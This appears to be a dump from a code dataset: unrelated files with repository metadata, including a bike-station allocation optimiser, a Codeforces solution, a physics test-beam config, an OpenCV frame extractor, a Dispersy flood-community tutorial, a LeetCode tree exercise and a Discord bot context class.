# failedSinceLastChange = 0
''' Generate the sid lists to choose from '''
# if randSwap == True:
# sidE = random.choice(sidList)
# sidF = random.choice(sidList)
# else:
sidEList = []
sidFList = []
showsidEList = []
showsidFList = []
n1 = 0
n2 = 0
com = 0 # select the most common empty/full station at first
while n1<listLength and com<=len(statE)-1:
sidE = statE[com][0]
if sidE != -1 and level[sidE] + nswap <= float(sM[sidE]['capacity']):
sidEList.append(sidE)
showsidEList.append([sidE, statE[com][1]])
n1+=1
com+=1
com = 0
while n2<listLength and com<=len(statF)-1:
sidF = statF[com][0]
if sidF != -1 and level[sidF] - nswap >= 0.0:
sidFList.append(sidF)
showsidFList.append([sidF, statF[com][1]])
n2+=1
com+=1
''' Randomly choose two stations from the lists '''
logger1.debug( ("sidEList: " + ', '.join(str(sid) for sid in showsidEList)) )
logger1.debug( ("sidFList: " + ', '.join(str(sid) for sid in showsidFList)) )
sidE = random.choice(sidEList)
sidF = random.choice(sidFList)
# sidEup = False
# sidFup = False
# sidEdn = False
# sidFdn = False
# while sidEup*sidFdn!=1 and sidEdn*sidFup!=1:
# sidEup = False
# sidFup = False
# sidEdn = False
# sidFdn = False
# # Determine which of the sidE, sidF can be increased or decreased
# if level[sidE] + nswap <= float(sM[sidE]['capacity']):
# sidEup = True
# if level[sidF] + nswap <= float(sM[sidF]['capacity']) and randomSwap==True: # if determined by data, has to decrease sid 2
# sidFup = True
# if level[sidE] - nswap >= 0.0 and randomSwap==True: # if determined by data, has to increase sid 1
# sidEdn = True
# if level[sidF] - nswap >= 0.0:
# sidFdn = True
# logger1.debug( ("sid" + str(sidE) + ", cap" + str(sM[sidE]['capacity']) + ", lvl " + str(level[sidE]) +
# "; sid" + str(sidF) + ", cap" + str(sM[sidF]['capacity']) + ", lvl " + str(level[sidF])) )
# logger1.debug( ("up,dn: sid" + str(sidE) + ", " + str(sidEup) + ", " + str(sidEdn) +
# "; sid" + str(sidF) + ", " + str(sidFup) + ", " + str(sidFdn)) )
# # if randomSwap == False:
# if sidFdn==False or sidE==sidF: # the 0 is bounding
# com+=1
# logger1.debug( ("com " + str(com)) )
# logger1.debug( ("list F" + str(statF[com])) )
# if com <= len(statF[com])-1:
# sidF = statF[com][0]
# if sidF == -1:
# sidF = random.choice(sidList)
# else: break
# logger1.debug( ("new sidF" + str(sidF)) )
# elif sidEup==False: # the capacity is bounding
# com+=1
# logger1.debug( ("com " + str(com)) )
# logger1.debug( ("list E" + str(statE[com])) )
# if com <= len(statE[com])-1:
# sidE = statE[com][0]
# if sidE == -1:
# sidE = random.choice(sidList)
# else: break
# logger1.debug( ("new sidE" + str(sidE)) )
# else:
# if (sidEup==True and sidFdn==False) or (sidEdn==True and sidFup==False):
# while sidE == sidF:
# sidF = random.choice(sidList)
# logger1.info( ("randomly selected sidF:" + str(sidF)) )
# elif (sidEup==False and sidFdn==True) or (sidEdn==False and sidFup==True):
# while sidE == sidF:
# sidE = random.choice(sidList)
# logger1.info( ("randomly selected sidE:" + str(sidE)) )
logger1.info( ("Found up, dn: sid" + str(sidE) + ", lvl " + str(level[sidE]) +
"; sid" + str(sidF) + ", lvl " + str(level[sidF])) )
TrySoln = level#.copy()
# if sidEup*sidFdn==1: # or sidEdn*sidFup==1
simCount += rep
# try swapping
TrySoln[sidE] += nswap
TrySoln[sidF] -= nswap
objAll1, obj1,ciwidth1,statE,statF = simulate(TrySoln, sM, durations, rep, daySeed, mbm, simMethod, startTime, numIntervals)
diff = obj0 - obj1
# if improved, do the swap, else, restore solution
if diff>0.0:
improve = diff
level = TrySoln
obj0 = obj1
results[simCount] = objAll1
logger1.warning( ("Improve: Obj1 = " + str(obj1) + " with ciwidth " + str(ciwidth1) +
" by " + str(diff) + " move " + str(nswap) + " from " + str(sidF) + " to " + str(sidE)) )
failedswap = 0 # suceed, reset number of attempts for this starting sol
failedSinceLastChange = 0
else:
failedswap += 1
failedSinceLastChange += 1
logger1.info( ("Failed to move " + str(nswap) + " from " + str(sidF) + " to " + str(sidE) +
" failed number: " + str(failedswap)) )
# elif sidEdn*sidFup==1:
# simCount += rep
# # try swapping
# TrySoln[sidF] += nswap
# TrySoln[sidE] -= nswap
# objAll1, obj1, ciwidth1, statE, statF = simulate(TrySoln, sM, durations, rep, daySeed, mbm, simMethod, startTime, numIntervals)
# # if improved, do the swap
# if diff>0.0:
# failedswap = 0
# improve = diff
# level = TrySoln
# obj0 = obj1
# results[simCount] = objAll1
# logger1.warning( ("Improve: Obj1 = " + str(obj1) + " with ciwidth " + str(ciwidth1) +
# " by " + str(diff) + " move " + str(nswap) + " from " + str(sidF) + " to " + str(sidE)) )
# failedswap = 0 # succeed, reset number of attempts for this starting sol
# else:
# failedswap += 1
# logger1.info( ("Failed to move " + str(nswap) + " from " + str(sidF) + " to " + str(sidE) +
# " failed number: " + str(failedswap)) )
logger1.warning( ("last improvement " + str(improve) + ", last obj" + str(obj0) + ", simCount" + str(simCount)) )
if (simCount-50) % (rep*10) == 0: # store every 10 iterations
storePickle(results, level, fileName)
except KeyboardInterrupt:
print '\nPausing... (Hit ENTER to continue, type quit to stop optimization and record solutions, type break to exit immediately.)'
try:
response = raw_input()
if response == 'quit':
break
objAllFinal, objFinal, ciwidthFinal, statE1, statF1 = simulate(level, sM, durations, 100, daySeed+1, mbm, simMethod, startTime, numIntervals)
end = time.time()
logger1.warning( ("Starting objective value: " + str(obj00) + ", ciwidth: " + str(ciwidth00)) )
logger1.warning( ("Starting objective value: " + str(obj00) + ", ciwidth: " + str(ciwidth00)) )
logger1.warning( ("Final objective value: " + str(objFinal) + ", Final ciwidth: " + str(ciwidthFinal)) )
logger1.warning( ("Total solutions evaluated by simulation = " + str(simCount/rep)) )
logger1.warning( ("Last failed number of swaps = " + str(failedswap)) )
logger1.warning( ("Elapsed time: " + str(end-start)) )
storePickle(results, level, fileName)
return (soln, objFinal, objAllFinal, ciwidthFinal)
elif response == 'break':
break
print 'Resuming...'
except KeyboardInterrupt:
print 'Resuming...'
continue
objAllFinal, objFinal, ciwidthFinal, statE1, statF1 = simulate(level, sM, durations, 100, daySeed+1, mbm, simMethod, startTime, numIntervals)
end = time.time()
logger1.warning( ("Starting objective value: " + str(obj00) + ", ciwidth: " + str(ciwidth00)) )
logger1.warning( ("Final objective value: " + str(objFinal) + ", Final ciwidth: " + str(ciwidthFinal)) )
logger1.warning( ("Total solutions evaluated by simulation = " + str(simCount/rep)) )
logger1.warning( ("Last failed number of swaps = " + str(failedswap)) )
logger1.warning( ("Elapsed time: " + str(end-start)) )
storePickle(results, level, fileName)
return end-start, objFinal, ciwidthFinal, obj00, ciwidth00
if __name__ == '__main__':
''' Configurations '''
seed = 8
randListSize = 10 # length of the list for randomized search. 1 is greedy.
reps = 30 # number of replications to evaluate each trial solution
start = 6 # start hour
end = 10 # end hour
startTime = int(start*60) # simulation start time (minutes, from 0 to 1439)
numIntervals = int(2*(end-start)) # number of 30-minute intervals to simulate
solutionName = 'CTMCVaryRateBikesOnly' + str(start) + "-" + str(end) + '_15x'
# solutionName = 'AverageAllocationFromNames'
simMethod = 'AltCond'
fileInd = numpy.random.randint(1,99)
fileName = (solutionName + "id" + str(fileInd))
''' Logging to File '''
# set up logging to file - see previous section for more details
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M',
filename='./outputsDO/'+solutionName+'id'+str(fileInd)+'.log',
filemode='w')
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
logging.info('gradSearch_v2.py')
logging.info('running CTMC')
logging.info(('random seed = ' + str(seed)))
logging.info(('reps = ' + str(reps)))
logging.info(('list size = ' + str(randListSize)))
logging.info(('solution name = ' + fileName))
# get state map info (caps, ords)
sM = eval(open(('./data/'+solutionName+'.txt')).read())
logging.info('Finished loading station map.')
# get min-by-min data
start = time.time()
mbm = cPickle.load(open("./data/mbm30minDec_15x.p", 'r'))
end = time.time()
load_time = end - start
logging.info('Finished loading flow rates. Time elapsed: %d' % load_time)
logging.debug( ('Check length of mbm = ' + str(len(mbm))) )
# get durations
durations = eval(open('./data/durationsLNMultiplier2.txt').read())
logging.info('Finished loading durations.')
randSwap = False
# # Simulate (no optimization)
# startTime = 420
# numIntervals = 4
# reps = 30
# runtime, obj0, ciwidth = basicSoln(sM, mbm, seed, reps, "Original", startTime, numIntervals)
# logging.warning( ("Simulation (Original): " + str(obj0) + ", ciwidth: " + str(ciwidth) + ", elapsed time:" + str(runtime)) )
# runtime, obj0, ciwidth = basicSoln(sM, mbm, seed, reps, "Alt2", startTime, numIntervals)
# logging.warning( ("Simulation (Alt2): " + str(obj0) + ", ciwidth: " + str(ciwidth) + ", elapsed time:" + str(runtime)) )
# runtime, obj0, ciwidth = basicSoln(sM, mbm, seed, 30, "AltCond")
# logging.warning( ("Simulation (AltCond): " + str(obj0) + ", ciwidth: " + str(ciwidth) + ", elapsed time:" + str(runtime)) )
# runtime, obj0, ciwidth = basicSoln(sM, mbm, seed, 30, "AltAliasCond")
# logging.warning( ("Simulation (AltAliasCond): " + str(obj0) + ", ciwidth: " + str(ciwidth) + ", elapsed time:" + str(runtime)) )
# Simulate and Optimize!
config = [seed, randListSize, simMethod, randSwap, reps]
runtime, objFinal, ciwidthFinal, obj00, ciwidth00 =randomSearch(sM, mbm, durations, startTime, numIntervals, config)
logging.warning( ("Random search id: " + str(fileInd) + ", solution: " + str(objFinal) + ", ciwidth: " + str(ciwidthFinal) + ", elapsed time:" + str(runtime)) )
|
[
"nj227@cornell.edu"
] |
nj227@cornell.edu
|
1b97012401160d2833300c50a56795077b693f9d
|
94e8871731fc19f14f087dfa99086623348a35f5
|
/r574/B.py
|
c33d6f646f2c0d9c687d7380a66853d5c699fa92
|
[] |
no_license
|
jokkebk/codeforces
|
7792eded86c623e8a7d089bfb786619e6ab4a667
|
781b1faee8ab46a2466cafd6c7d75e51db22cf12
|
refs/heads/master
| 2023-08-10T04:42:01.856401
| 2023-07-28T20:34:33
| 2023-07-28T20:34:33
| 22,697,289
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 186
|
py
|
can = lambda n, e: (n-e+1)*(n-e)//2 - e
n, k = map(int, input().split())
a = 0
for i in range(len(bin(n))-3, -1, -1):
if a + 2**i < n and can(n, a + 2**i) >= k: a += 2**i
print(a)
|
[
"joonas.pihlajamaa@iki.fi"
] |
joonas.pihlajamaa@iki.fi
|
7163f816dfd5db84ab30220ee8fb101ce0b68c6c
|
66e6360325b781ed0791868765f1fd8a6303726f
|
/TB2009/WorkDirectory/5173 Pulse Timing/Pion_108538.py
|
e53460495e0c5366f4f533ec68de84b6c0a8447d
|
[] |
no_license
|
alintulu/FHead2011PhysicsProject
|
c969639b212d569198d8fce2f424ce866dcfa881
|
2568633d349810574354ad61b0abab24a40e510e
|
refs/heads/master
| 2022-04-28T14:19:30.534282
| 2020-04-23T17:17:32
| 2020-04-23T17:17:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,320
|
py
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("EventDisplay")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
process.source = cms.Source("HcalTBSource",
fileNames = cms.untracked.vstring("file:/tmp/chenyi/HTB_108538.root"),
streams = cms.untracked.vstring('Chunk699', 'HCAL_Trigger', 'HCAL_SlowData', 'HCAL_QADCTDC', 'HCAL_DCC021')
)
process.tbunpack = cms.EDFilter("HcalTBObjectUnpacker",
#IncludeUnmatchedHits = cms.untracked.bool(False),
HcalTriggerFED = cms.untracked.int32(1),
HcalVLSBFED = cms.untracked.int32(699),
HcalTDCFED = cms.untracked.int32(8),
HcalQADCFED = cms.untracked.int32(8),
HcalSlowDataFED = cms.untracked.int32(3),
ConfigurationFile = cms.untracked.string('configQADCTDC_TB2009.txt')
)
process.vlsbinfo = cms.EDProducer("VLSBInformationProducer",
minSample = cms.untracked.uint32(0),
maxSample = cms.untracked.uint32(31),
baselineSamples = cms.untracked.uint32(2),
mip = cms.untracked.string("MIP_EarlyRejection.txt"),
useMotherBoard0 = cms.untracked.bool(True),
useMotherBoard1 = cms.untracked.bool(False),
useMotherBoard2 = cms.untracked.bool(False),
useMotherBoard3 = cms.untracked.bool(False),
usePedestalMean = cms.untracked.bool(False)
)
process.ABCcut = cms.EDFilter("SingleTowerParticleFilter")
process.hitcut = cms.EDFilter("HitXFilter",
maximum = cms.untracked.double(-5)
)
process.MessageLogger = cms.Service("MessageLogger",
default = cms.untracked.PSet(
reportEvery = cms.untracked.int32(100)
)
)
process.alignpion2 = cms.EDAnalyzer("AlignPulseAnalyzer",
rejectionSample = cms.untracked.int32(2),
rejectionHeight = cms.untracked.double(0.1),
output = cms.untracked.string("Time_108538_2.root"),
maxsample = cms.untracked.double(1000),
minsample = cms.untracked.double(15)
)
process.alignpion1 = cms.EDAnalyzer("AlignPulseAnalyzer",
rejectionSample = cms.untracked.int32(2),
rejectionHeight = cms.untracked.double(0.1),
output = cms.untracked.string("Time_108538_1.root"),
maxsample = cms.untracked.double(40),
minsample = cms.untracked.double(0)
)
process.p = cms.Path(
process.tbunpack *
process.ABCcut *
process.vlsbinfo *
process.hitcut *
process.alignpion1 *
process.alignpion2
)
|
[
"yichen@positron01.hep.caltech.edu"
] |
yichen@positron01.hep.caltech.edu
|
932d44e25a32ff21e1959a43d5d237c442cbc79f
|
d9e8996b363cb17282633b5d97ed234fbafa4ed5
|
/extrai_frame.py
|
72f1a56bbbdb92330c6bb2b1be8eb06f84b1f55e
|
[] |
no_license
|
cardosolh/MachineLearning
|
952e068a05f0a10e5968126780440104bd46cd9a
|
f711837a27924bfbf4342dc3154dbe2392a597c0
|
refs/heads/master
| 2020-03-22T13:20:45.639561
| 2018-07-07T14:02:28
| 2018-07-07T14:02:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 548
|
py
|
import cv2
import os
vidcap = cv2.VideoCapture('videos/video.mp4')
success,image = vidcap.read()
#fps = vidcap.get(cv2.cv.CV_CAP_PROP_FPS)
#print fps
#print fps
count = 0
success = True
cont = 1
while success:
success, image = vidcap.read()
if cont > 27: ###Salta de 27 em 27 frames
cv2.imwrite("frames/frame%d.jpg" % count, image) # save frame as JPEG file
cv2.imshow('img', image) #Apresenta o frame na tela.
cv2.waitKey(0)
cv2.destroyAllWindows()
count += 1
cont = 0
cont = cont + 1
|
[
"noreply@github.com"
] |
cardosolh.noreply@github.com
|
21eba5db11094720bbdfee684ef20dcab683a4ce
|
d866a4abbfaea885e64a0a55bae4741d964b8e6b
|
/experiments/example_community_threaded.py
|
958fba4329ab3abe50d5d8704d4c01abdb5eab23
|
[] |
no_license
|
qstokkink/VisualDispersy
|
b3c9816f2efc6132758a9077a10c892b2176917d
|
bd221cb2951574870c9f04253429655ddc9fea0e
|
refs/heads/master
| 2020-12-24T18:55:46.222286
| 2016-05-08T08:40:09
| 2016-05-08T08:40:09
| 57,215,998
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,983
|
py
|
"""An example community (FloodCommunity) to both show
how Dispersy works and how VisualDispersy works.
Credit for the original tutorial Community goes to Boudewijn Schoon.
"""
import logging
import struct
import sys
import time
import string
import os.path
# Void all Dispersy log messages
logging.basicConfig(level=logging.CRITICAL)
logging.getLogger().propagate = False
from M2Crypto import EC, BIO
from twisted.internet import reactor, threads
from dispersy.authentication import MemberAuthentication
from dispersy.community import Community
from dispersy.conversion import DefaultConversion, BinaryConversion
from dispersy.destination import CommunityDestination
from dispersy.dispersy import Dispersy
from dispersy.distribution import FullSyncDistribution
from dispersy.endpoint import StandaloneEndpoint
from dispersy.member import DummyMember
from dispersy.message import Message, DropPacket, DropMessage, BatchConfiguration
from dispersy.payload import Payload
from dispersy.resolution import PublicResolution
from dispersyviz.visualdispersy import VisualDispersy, VisualCommunity
class FloodCommunity(VisualCommunity):
"""A simple community to exemplify Dispersy behavior.
"""
def __init__(self, dispersy, master_member, my_member):
"""Callback for when Dispersy initializes this community.
Note that this function signature is a Dispersy requirement.
"""
super(
FloodCommunity,
self).__init__(
dispersy,
master_member,
my_member)
self.message_received = 0
def initiate_conversions(self):
"""Tell Dispersy what wire conversion handlers we have.
"""
return [DefaultConversion(self), FloodConversion(self)]
@property
def dispersy_auto_download_master_member(self):
"""Do not automatically download our (bogus) master member.
"""
return False
@property
def dispersy_enable_fast_candidate_walker(self):
return True
def initiate_meta_messages(self):
""">EXTEND< the current meta messages with our custom Flood type.
"""
messages = super(FloodCommunity, self).initiate_meta_messages()
ourmessages = [Message(self,
u"flood",
# Unique identifier
MemberAuthentication(
encoding="sha1"),
# Member identifier hash type
PublicResolution(),
# All members can add messages
FullSyncDistribution(
enable_sequence_number=False,
synchronization_direction=u"ASC",
priority=255),
# Synchronize without sequence number, delivering messages with the lowest
# (Lamport) global time first and the highest priority
CommunityDestination(
node_count=10),
# Push to >AT MOST< 10 other nodes initially
FloodPayload(),
# The object to actually carry our payload
self.check_flood,
# Callback to validate a received message
self.on_flood,
# Callback to actually handle a validated
# message
batch=BatchConfiguration(0.0))] # Amount of time (seconds) to save up messages before handling them
messages.extend(ourmessages)
return messages
def create_flood(self, count):
"""Dump some messages into the Community overlay.
"""
self.start_flood_time = time.time()
if count <= 0:
return
# Retrieve the meta object we defined in initiate_meta_messages()
meta = self.get_meta_message(u"flood")
# Instantiate the message
messages = [meta.impl(authentication=(self.my_member,), # This client signs this message
# distribution=(self.claim_global_time(),meta.distribution.claim_sequence_number()),
# # When you enable sequence numbers (see
# initiate_meta_messages)
distribution=(
self.claim_global_time(),
),
# Without sequence numbers you just need our
# value of the Lamport clock
payload=("flood #%d" % (i + (self.peerid - 1) * count),)) # Some arbitrary message contents
for i
in xrange(count)]
# Spread this message into the network (including to ourselves)
self.dispersy.store_update_forward(messages, True, True, True)
def check_flood(self, messages):
"""Callback to verify the contents of the messages received.
"""
for message in messages:
# We don't actually check them, just forward them
# Otherwise check out DropPacket and the like in dispersy.message
yield message
def on_flood(self, messages):
"""Callback for when validated messages are received.
"""
self.message_received += len(messages)
# Report to Visual Dispersy
self.vz_report_target(
"messages",
self.message_received,
self.total_message_count)
if self.message_received == self.total_message_count:
# Wait for the experiment to end IN A THREAD
# If you don't do this YOU WILL BLOCK DISPERSY COMPLETELY
reactor.callInThread(self.wait_for_end)
def wait_for_end(self):
"""Busy wait for the experiment to end
"""
self.vz_wait_for_experiment_end()
self.dispersy.stop()
class FloodPayload(Payload):
"""The data container for FloodCommunity communications.
"""
class Implementation(Payload.Implementation):
def __init__(self, meta, data):
super(FloodPayload.Implementation, self).__init__(meta)
self.data = data
class FloodConversion(BinaryConversion):
"""Convert the payload into binary data (/a string) which can be
sent over the internet.
"""
def __init__(self, community):
"""Initialize the new Conversion object
"""
super(FloodConversion, self).__init__(community, "\x01")
# Use community version 1 (only communicates with other version
# 1's)
self.define_meta_message(
chr(1),
community.get_meta_message(u"flood"),
self._encode_flood,
self._decode_flood) # Our only message type is assigned id 1 (byte), with encode and decode callbacks
def _encode_flood(self, message):
"""The encode callback to convert a Message into a binary representation (string).
"""
return struct.pack("!L", len(message.payload.data)), message.payload.data
def _decode_flood(self, placeholder, offset, data):
"""Given a binary representation of our payload
convert it back to a message.
"""
if len(data) < offset + 4:
raise DropPacket("Insufficient packet size")
data_length, = struct.unpack_from("!L", data, offset)
offset += 4
if len(data) < offset + data_length:
raise DropPacket("Insufficient packet size")
data_payload = data[offset:offset + data_length]
offset += data_length
return offset, placeholder.meta.payload.implement(data_payload)
def join_flood_overlay(
dispersy,
masterkey,
peerid,
totalpeers,
new_message_count,
total_message_count):
"""Join our custom FloodCommunity.
"""
time.sleep(5.0)
# Use our bogus master member
master_member = dispersy.get_member(public_key=masterkey)
# Register our client with Dispersy
my_member = dispersy.get_new_member()
# Register our community with Dispersy
community = FloodCommunity.init_community(
dispersy, master_member, my_member)
# Initialize our custom community, because we can't change the constructor
community.total_message_count = total_message_count
community.peerid = peerid
community.totalpeers = totalpeers
# Report to Visual Dispersy
community.vz_report_target("messages", 0, total_message_count)
print "%d] Joined community" % (dispersy.lan_address[1])
# Allow the Community members some time to find each other.
while len(list(community.dispersy_yield_verified_candidates())) < totalpeers:
time.sleep(1.0)
print "%d] Flooding community" % (dispersy.lan_address[1])
# Call our message creation function to share a certain amount
# of messages with the Community.
community.create_flood(new_message_count)
def generateMasterkey():
"""Generate an M2Crypto Elliptic Curve key.
"""
membuffer = BIO.MemoryBuffer()
keypair = EC.gen_params(EC.NID_sect233k1)
keypair.gen_key()
keypair.save_pub_key_bio(membuffer)
rawpubkey = membuffer.read()
membuffer.reset()
fpubkey = rawpubkey[27:]
fpubkey = fpubkey[:string.find(fpubkey, '-')]
return fpubkey # BASE64 ENCODED
def establishMasterkey(peerid):
"""Get the master key for this community.
This is stored in the file 'generated_master_key.key'.
Peerid 1 is responsible for making sure this file exists.
"""
if peerid == 1:
# Peerid 1 makes sure the key file exists
if not os.path.isfile('generated_master_key.key'):
f = open('generated_master_key.key', 'w')
f.write(generateMasterkey())
f.close()
else:
# All other peers simply wait for the keyfile to exist
# [And pray peer 1 did not crash]
while not os.path.isfile('generated_master_key.key'):
time.sleep(0.5)
keyfile = open('generated_master_key.key', 'r')
masterkey = keyfile.read().decode("BASE64")
keyfile.close()
return masterkey
def stopOnDispersy(dispersy, reactor):
"""Exit when Dispersy closes.
"""
time.sleep(20.0)
while dispersy.running:
time.sleep(10.0)
reactor.stop()
def main(
peerid,
totalpeers,
new_message_count,
total_message_count,
vz_server_port):
"""VisualDispersy will call this function with:
- peerid: [1~totalpeers] our id
- totalpeers: the total amount of peers in our experiment
- new_message_count: the amount of messages we are supposed to share
- total_message_count: the total amount of messages we are supposed to receive (including our own)
- vz_server_port: the server port we need to connect to for VisualDispersy
"""
# Get the master key
masterkey = establishMasterkey(peerid)
# Make an endpoint (starting at port 10000, incrementing until we can open)
endpoint = StandaloneEndpoint(10000)
# Create a VisualDispersy instance for the endpoint and store the SQLite 3
# database in RAM
dispersy = VisualDispersy(endpoint, u".", u":memory:")
# Initialize the VisualDispersy server connection
dispersy.vz_init_server_connection(vz_server_port)
# Start Dispersy in a thread (it blocks)
reactor.callInThread(dispersy.start, True)
# Add an observer to do a clean exit when Dispersy is closed
reactor.callInThread(stopOnDispersy, dispersy, reactor)
# After 20 seconds, start the experiment
reactor.callInThread(
join_flood_overlay,
dispersy,
masterkey,
peerid,
totalpeers,
new_message_count,
total_message_count)
reactor.run()
|
[
"goqs@hotmail.com"
] |
goqs@hotmail.com
|
b09fa4efa61f4470eac5035edd9f2b31fdba7b31
|
4bedcf0c6b6c9af169f1922423b90e834ff550d1
|
/938-range-sum-of-bst.py
|
b1c8fa80555f4ad670f000252d264a8c1d593740
|
[] |
no_license
|
serdarkuyuk/LeetCode
|
ab5b0b22e6393ff799966cedfa97e5be2ee6163a
|
667683835c18c44f01448304a68a22be422bb0d8
|
refs/heads/master
| 2021-07-03T09:02:51.027772
| 2020-12-26T04:00:47
| 2020-12-26T04:00:47
| 209,383,466
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 916
|
py
|
# 10
# 5 15
# 3 7 x 18
# L = 7, R = 15
#
# 10
# 5 15
# 3 7 13 18
# 1 x 6 x
# L = 6, R = 10
class TreeNode:
def __init__(self, val):
self.val = val
self.left = None
self.right = None
mylist = [10,5,15,3,7,None,18]
# left 2*i+1
# right 2*i+2
def treefunction(mylist, root, i, n):
if i < n:
temp = TreeNode(mylist[i])
root = temp
root.left = treefunction(mylist, root.left, 2*i+1, n)
root.righ = treefunction(mylist, root.right, 2*i+2, n)
return root
def inOrder(root):
if root != None:
inOrder(root.left)
print(root.val, end = ' ')
inOrder(root.right)
n = len(mylist)
root = None
root = treefunction(mylist, root, 0, n)
inOrder(root)
# root = TreeNode(10)
# root.left = TreeNode(5, 3, 7)
# root.right = TreeNode(15, None, 18)
#
#
# print(root.right.left)
|
[
"serdarkuyuk@gmail.com"
] |
serdarkuyuk@gmail.com
|
c2ef3fab0167eea4517258f87dd8245c008b5349
|
cbaca92f7faf606f3263f72e9d7058610b391cbb
|
/utils/context.py
|
3b0ecb193bd085bbbdcbf9d2edd31c3c2a20c938
|
[
"Apache-2.0"
] |
permissive
|
Falsejoey/NabBot
|
83bd811e9404bb3f9bfa2064dc70edfc15f29f19
|
296a14c0f205576f90c31578b8c684ab60c92017
|
refs/heads/master
| 2020-03-24T15:23:26.332312
| 2018-07-24T20:14:24
| 2018-07-24T20:14:24
| 142,788,089
| 0
| 0
|
Apache-2.0
| 2018-07-29T19:05:12
| 2018-07-29T19:05:12
| null |
UTF-8
|
Python
| false
| false
| 10,749
|
py
|
import asyncio
import functools
import re
from typing import Union, Optional, Callable, TypeVar, List, Any, Sequence
import discord
from discord.ext import commands
from utils.config import config
from utils.database import get_server_property
_mention = re.compile(r'<@!?([0-9]{1,19})>')
T = TypeVar('T')
class NabCtx(commands.Context):
"""An override of :class:`commands.Context` that provides properties and methods for NabBot."""
guild: discord.Guild
message: discord.Message
channel: discord.TextChannel
author: Union[discord.User, discord.Member]
me: Union[discord.Member, discord.ClientUser]
command: commands.Command
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.yes_no_reactions = ("🇾", "🇳")
self.check_reactions = (config.true_emoji, config.false_emoji)
# Properties
@property
def author_permissions(self) -> discord.Permissions:
"""Shortcut to check the command author's permission to the current channel.
:return: The permissions for the author in the current channel.
"""
return self.channel.permissions_for(self.author)
@property
def ask_channel_name(self) -> Optional[str]:
"""Gets the name of the ask channel for the current server.
:return: The name of the ask channel if applicable
:rtype: str or None"""
if self.guild is None:
return None
ask_channel_id = get_server_property(self.guild.id, "ask_channel", is_int=True)
ask_channel = self.guild.get_channel(ask_channel_id)
if ask_channel is None:
return config.ask_channel_name
return ask_channel.name
@property
def bot_permissions(self) -> discord.Permissions:
"""Shortcut to check the bot's permission to the current channel.
:return: The permissions for the author in the current channel."""
return self.channel.permissions_for(self.me)
@property
def clean_prefix(self) -> str:
"""Gets the clean prefix used in the command invocation.
This is used to clean mentions into plain text."""
m = _mention.match(self.prefix)
if m:
user = self.bot.get_user(int(m.group(1)))
if user:
return f'@{user.name} '
return self.prefix
@property
def is_askchannel(self):
"""Checks if the current channel is the command channel"""
ask_channel_id = get_server_property(self.guild.id, "ask_channel", is_int=True)
ask_channel = self.guild.get_channel(ask_channel_id)
if ask_channel is None:
return self.channel.name == config.ask_channel_name
return ask_channel == self.channel
@property
def is_lite(self) -> bool:
"""Checks if the current context is limited to lite mode.
If the guild is in the lite_guilds list, the context is in lite mode.
If the guild is in private message, and the message author is in at least ONE guild that is not in lite_guilds,
then context is not lite"""
if self.guild is not None:
return self.guild.id in config.lite_servers
if self.is_private:
for g in self.bot.get_user_guilds(self.author.id):
if g.id not in config.lite_servers:
return False
return False
@property
def is_private(self) -> bool:
"""Whether the current context is a private channel or not."""
return self.guild is None
@property
def long(self) -> bool:
"""Whether the current context allows long replies or not
Private messages and command channels allow long replies.
"""
if self.guild is None:
return True
return self.is_askchannel
@property
def usage(self) -> str:
"""Shows the parameters signature of the invoked command"""
if self.command.usage:
return self.command.usage
else:
params = self.command.clean_params
if not params:
return ''
result = []
for name, param in params.items():
if param.default is not param.empty:
# We don't want None or '' to trigger the [name=value] case and instead it should
# do [name] since [name=None] or [name=] are not exactly useful for the user.
should_print = param.default if isinstance(param.default, str) else param.default is not None
if should_print:
result.append(f'[{name}={param.default!r}]')
else:
result.append(f'[{name}]')
elif param.kind == param.VAR_POSITIONAL:
result.append(f'[{name}...]')
else:
result.append(f'<{name}>')
return ' '.join(result)
@property
def world(self) -> Optional[str]:
"""Check the world that is currently being tracked by the guild
:return: The world that the server is tracking.
:rtype: str | None
"""
if self.guild is None:
return None
else:
return self.bot.tracked_worlds.get(self.guild.id, None)
async def choose(self, matches: Sequence[Any], title="Suggestions"):
if len(matches) == 0:
raise ValueError('No results found.')
if len(matches) == 1:
return matches[0]
embed = discord.Embed(colour=discord.Colour.blurple(), title=title,
description='\n'.join(f'{index}: {item}' for index, item in enumerate(matches, 1)))
msg = await self.send("I couldn't find what you were looking for, maybe you mean one of these?\n"
"**Only say the number** (*0 to cancel*)", embed=embed)
def check(m: discord.Message):
return m.content.isdigit() and m.author.id == self.author.id and m.channel.id == self.channel.id
message = None
try:
message = await self.bot.wait_for('message', check=check, timeout=30.0)
index = int(message.content)
if index == 0:
await self.send("Alright, choosing cancelled.", delete_after=10)
return None
try:
await msg.delete()
return matches[index - 1]
except IndexError:
await self.send(f"{self.tick(False)} That wasn't in the choices.", delete_after=10)
except asyncio.TimeoutError:
return None
finally:
try:
if message:
await message.delete()
except (discord.Forbidden, discord.NotFound):
pass
async def execute_async(self, func: Callable[..., T], *args, **kwargs) -> T:
"""Executes a synchronous function inside an executor.
:param func: The function to call inside the executor.
:param args: The function's arguments
:param kwargs: The function's keyword arguments.
:return: The value returned by the function, if any.
"""
ret = await self.bot.loop.run_in_executor(None, functools.partial(func, *args, **kwargs))
return ret
async def input(self, *, timeout=60.0, clean=False, delete_response=False) \
-> Optional[str]:
"""Waits for text input from the author.
:param timeout: Maximum time to wait for a message.
:param clean: Whether the content should be cleaned or not.
:param delete_response: Whether to delete the author's message after.
:return: The content of the message replied by the author
"""
def check(_message):
return _message.channel == self.channel and _message.author == self.author
try:
value = await self.bot.wait_for("message", timeout=timeout, check=check)
if clean:
ret = value.clean_content
else:
ret = value.content
